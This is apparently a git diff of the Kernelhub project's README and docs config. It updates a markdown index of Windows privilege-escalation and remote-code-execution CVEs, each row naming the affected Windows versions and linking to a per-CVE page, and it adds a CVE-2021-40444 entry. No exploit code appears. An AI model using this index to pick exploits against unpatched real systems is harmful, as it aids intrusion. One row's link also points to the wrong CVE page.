[CVE-2020-1066](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1066) | .NET Framework Elevation | Windows 7/2008 | -| [CVE-2020-1054](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1054) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-1015](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1015) | Windows Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-1472](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/Server | -| [CVE-2020-0683](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0683) | Windows Installer Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-0796](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0796) | SMBv3 Remote Code Execution | Windows Server | -| [CVE-2020-0787](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2019-1458](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2019-1388](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 | -| [CVE-2019-0859](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0859) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2019-0803](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8639](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8453](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8440](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2018-8120](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 | -| [CVE-2018-1038](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 | -| [CVE-2018-0743](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 | -| [CVE-2018-0833](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 | -| [CVE-2017-8464](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 | -| [CVE-2017-0213](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2017-0143](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | -| [CVE-2017-0101](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-7255](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | -| [CVE-2016-3371](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-3309](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-3225](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0099](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0095](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0051](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0041](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2015-2546](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2015-2387](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt | -| [CVE-2015-2370](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | -| [CVE-2015-1725](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | -| [CVE-2015-1701](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista | -| [CVE-2015-0062](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 | -| [CVE-2015-0057](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2015-0003](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2015-0002](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 | -| [CVE-2014-6324](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-6321](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-4113](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-4076](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 | -| [CVE-2014-1767](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2013-5065](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-5065) | NDProxy.sys | Windows XP/2003 | -| [CVE-2013-1345](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp | -| [CVE-2013-1332](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt | -| [CVE-2013-0008](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt | -| [CVE-2012-0217](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp | -| [CVE-2012-0002](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp | -| [CVE-2011-2005](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp | -| [CVE-2011-1974](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp | -| [CVE-2011-1249](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp | -| [CVE-2011-0045](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp | -| [CVE-2010-4398](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp | -| [CVE-2010-3338](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista | -| [CVE-2010-2554](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista | -| [CVE-2010-1897](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp | -| [CVE-2010-0270](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 | -| [CVE-2010-0233](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2010-0020](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp | -| [CVE-2009-2532](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista | -| [CVE-2009-0079](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp | -| [CVE-2008-4250](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp | -| [CVE-2008-4037](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2008-3464](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp | -| [CVE-2008-1084](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2006-3439](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp | -| [CVE-2005-1983](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2005-1983) | PnP Service | Windows 2000/Xp | -| [CVE-2003-0352](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt | +| SecurityBulletin | Description | OperatingSystem | +| :----------------------------------------------------------- | :----------------------------------------------------------: | :----------------------------------------------: | +| [CVE-2021-40444](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-40444) | Windows IE RCE | Windows 7/8.1/10/2008/2012/2016/2019/2022/Server | +| [CVE-2021-36934](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-36934) | Windows Elevation | Windows 10 | +| [CVE-2021-33739](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server | +| [CVE-2021-26868](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server | +| [CVE-2021-1732](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server | +| [CVE-2021-1709](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-17087](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-17087) | Windows Kernel Local Elevation of Privilege Vulnerability | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-16938](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-16938) | Windows Kernel Information Disclosure Vulnerability | Windows Server | +| [CVE-2020-16898](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-16898) | Windows TCP/IP Remote Code Execution Vulnerability | Windows 10/2019/Server | +| [CVE-2020-1337](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1337) | Windows Print Spooler Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-1313](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1313) | Windows Update Orchestrator Service Elevation | Windows 10/Server | +| [CVE-2020-1066](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1066) | .NET Framework Elevation | Windows 7/2008 | +| [CVE-2020-1054](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1054) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-1015](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1015) | Windows Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-1472](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/Server | +| [CVE-2020-0683](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0683) | Windows Installer Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-0796](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0796) | SMBv3 Remote Code Execution | Windows Server | +| [CVE-2020-0787](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2019-1458](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2019-1388](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 | +| [CVE-2019-0859](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0859) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2019-0803](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8639](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8453](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8440](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2018-8120](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 | +| [CVE-2018-1038](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 | +| [CVE-2018-0743](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 | +| [CVE-2018-0833](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 | +| [CVE-2017-8464](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 | +| [CVE-2017-0213](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2017-0143](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | +| [CVE-2017-0101](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-7255](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | +| [CVE-2016-3371](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-3309](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-3225](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0099](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0095](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0051](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0041](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2015-2546](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2015-2387](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt | +| [CVE-2015-2370](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | +| [CVE-2015-1725](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | +| [CVE-2015-1701](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista | +| [CVE-2015-0062](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 | +| [CVE-2015-0057](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2015-0003](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2015-0002](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 | +| [CVE-2014-6324](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-6321](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-4113](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-4076](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 | +| [CVE-2014-1767](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2013-5065](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-5065) | NDProxy.sys | Windows XP/2003 | +| [CVE-2013-1345](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp | +| [CVE-2013-1332](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt | +| [CVE-2013-0008](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt | +| [CVE-2012-0217](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp | +| [CVE-2012-0002](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp | +| [CVE-2011-2005](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp | +| [CVE-2011-1974](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp | +| [CVE-2011-1249](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp | +| [CVE-2011-0045](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp | +| [CVE-2010-4398](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp | +| [CVE-2010-3338](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista | +| [CVE-2010-2554](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista | +| [CVE-2010-1897](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp | +| [CVE-2010-0270](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 | +| [CVE-2010-0233](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2010-0020](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp | +| [CVE-2009-2532](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista | +| [CVE-2009-0079](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp | +| [CVE-2008-4250](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp | +| [CVE-2008-4037](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2008-3464](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp | +| [CVE-2008-1084](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2006-3439](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp | +| [CVE-2005-1983](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2005-1983) | PnP Service | Windows 2000/Xp | +| [CVE-2003-0352](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt | diff --git a/docs/Docs/config.js b/docs/Docs/config.js index e03df7b..3402fa7 100644 --- a/docs/Docs/config.js +++ b/docs/Docs/config.js @@ -243,6 +243,9 @@ let config = { { path: '/CN/CVE-2021-36934', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/CVE-2021-36934/README.md' }, + { + path: '/CN/CVE-2021-40444', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/CVE-2021-40444/README.md' + }, ] }, ],